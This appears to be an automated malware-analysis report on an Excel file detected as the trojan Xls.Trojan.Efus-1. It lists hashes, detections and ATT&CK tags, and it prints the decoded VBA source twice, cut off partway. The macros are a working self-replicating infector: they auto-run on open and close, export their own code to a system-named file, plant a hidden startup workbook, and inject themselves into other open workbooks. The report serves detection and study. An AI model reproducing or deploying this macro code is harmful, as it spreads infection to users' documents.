Xls.Trojan.Efus-1 Office (OLE) malware analysis — malicious · 5e727bbf824c0af3

MALICIOUS

Office (OLE)

31.0 KB Created: 2002-09-27 05:38:09 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: fc3d10778a703282373b7a77a508597e SHA-1: ae7e07f76aac836dbd9fd4ac726c94bd6748a2d1 SHA-256: 5e727bbf824c0af3765c52e3b8e3baaf1967653b024ae4d57064ea18f3911c7b

160 Risk Score

Malware Insights

Xls.Trojan.Efus-1 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel spreadsheet containing VBA macros, including Auto_Open and Auto_Close routines, which are commonly used to initiate malicious actions. The ClamAV detection 'Xls.Trojan.Efus-1' strongly suggests a known trojan. The macros appear to attempt to interact with files in the 'C:\MS_DOS' directory, potentially for staging or execution of a secondary payload.

Heuristics 4

ClamAV: Xls.Trojan.Efus-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Efus-1
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30231 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	30231 bytes
SHA-256: `8fead946a8ba6aeef7c5b4ed20d3f979f6a65caae6e38daa46d342f78b85ce45`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "SUFE" Dim Modu Dim Infected Dim Code Sub Option_Set() On Error Resume Next With Application .UserName = "SUFE" .StandardFont = "宋体" .StandardFontSize = "12" .DefaultFilePath = "C:\My Documents" .AltStartupPath = "C:\MS_DOS" .EnableSound = False .RollZoom = False End With End Sub Sub Settle_C() Dim If_Settled As Boolean On Error Resume Next With Application.FileSearch .LookIn = "C:\MS_DOS" .FileName = "Command.dos" If .Execute > 0 Then If_Settled = True End If End With If If_Settled = True Then Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Action", Description:="", _ ShortcutKey:="c" Application.OnWindow = "C:\MS_DOS\Command.DOS!Action" Call CodeExport Exit Sub Else Call CodeExport On Error Resume Next MkDir ("c:\MS_DOS") Workbooks.Add Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys") ActiveWorkbook.SaveAs FileName:="C:\MS_DOS\Command.DOS", FileFormat:=xlNormal ActiveWindow.Visible = False End If Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Action", Description:="", _ ShortcutKey:="c" Application.OnWindow = "C:\MS_DOS\Command.DOS!Action" End Sub Sub Auto_open() On Error Resume Next Call Action End Sub Sub Auto_close() On Error Resume Next Call Action Application.ActiveWorkbook.Save End Sub Sub Action() Dim j On Error Resume Next Application.ScreenUpdating = False Call Option_Set Call Settle_C For j = 1 To Application.Workbooks.Count If (Application.Workbooks(j).FullName <> "C:\MS_DOS\Command.DOS" _ And InStr(Application.Workbooks(j).FullName, "\") <> 0) Then Application.Workbooks(j).Activate Call CodeImport End If Next j Application.ScreenUpdating = True Call Punish End Sub Sub CodeExport() Dim i Dim hFile As Long On Error Resume Next i = 0 For Each Modu In Application.VBE.ActiveVBProject.VBComponents i = i + 1 If (Modu.Name = "SUFE") Then Code = Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.Lines(1, Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.CountOfLines) Code = "Attribute VB_Name = ""SUFE""" & Chr(13) & Code Exit For End If Next Modu hFile = FreeFile Open "c:\Ms_IO.sys" For Output Access Write As hFile Print #hFile, Code Close hFile End Sub Sub CodeImport() On Error Resume Next Infected = False For Each Modu In Application.ActiveWorkbook.VBProject.VBComponents If (Modu.Name = "SUFE") Then Infected = True Exit For End If Next Modu If Infected = False Then App ... (truncated)

SHA-256: 8fead946a8ba6aeef7c5b4ed20d3f979f6a65caae6e38daa46d342f78b85ce45

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "SUFE"

    Dim Modu
    Dim Infected
    Dim Code
Sub Option_Set()
On Error Resume Next
    With Application
        .UserName = "SUFE"
        .StandardFont = "宋体"
        .StandardFontSize = "12"
        .DefaultFilePath = "C:\My Documents"
        .AltStartupPath = "C:\MS_DOS"
        .EnableSound = False
        .RollZoom = False
    End With
End Sub
Sub Settle_C()
    Dim If_Settled As Boolean
    On Error Resume Next
    With Application.FileSearch
        .LookIn = "C:\MS_DOS"
        .FileName = "Command.dos"
        If .Execute > 0 Then
            If_Settled = True
        End If
    End With
    If If_Settled = True Then
        Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Action", Description:="", _
            ShortcutKey:="c"
        Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
        Call CodeExport
        Exit Sub
    Else
        Call CodeExport
        On Error Resume Next
        MkDir ("c:\MS_DOS")
        Workbooks.Add
        Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys")
        ActiveWorkbook.SaveAs FileName:="C:\MS_DOS\Command.DOS", FileFormat:=xlNormal
        ActiveWindow.Visible = False
    End If
    Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Action", Description:="", _
        ShortcutKey:="c"
    Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
End Sub

Sub Auto_open()
    On Error Resume Next
    Call Action
End Sub
Sub Auto_close()
    On Error Resume Next
    Call Action
    Application.ActiveWorkbook.Save
End Sub
Sub Action()
    Dim j
    On Error Resume Next
    Application.ScreenUpdating = False
    Call Option_Set
    Call Settle_C
    For j = 1 To Application.Workbooks.Count
        If (Application.Workbooks(j).FullName <> "C:\MS_DOS\Command.DOS" _
            And InStr(Application.Workbooks(j).FullName, "\") <> 0) Then
                Application.Workbooks(j).Activate
                Call CodeImport
        End If
    Next j
    Application.ScreenUpdating = True
    Call Punish
End Sub
Sub CodeExport()
    Dim i
    Dim hFile As Long
    On Error Resume Next
    i = 0
    For Each Modu In Application.VBE.ActiveVBProject.VBComponents
        i = i + 1
        If (Modu.Name = "SUFE") Then
            Code = Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.Lines(1, Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.CountOfLines)
            Code = "Attribute VB_Name = ""SUFE""" & Chr(13) & Code
        Exit For
        End If
    Next Modu
    hFile = FreeFile
    Open "c:\Ms_IO.sys" For Output Access Write As hFile
        Print #hFile, Code
    Close hFile
End Sub
Sub CodeImport()
    On Error Resume Next
    Infected = False
    For Each Modu In Application.ActiveWorkbook.VBProject.VBComponents
        If (Modu.Name = "SUFE") Then
            Infected = True
            Exit For
        End If
    Next Modu
    If Infected = False Then
        App
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.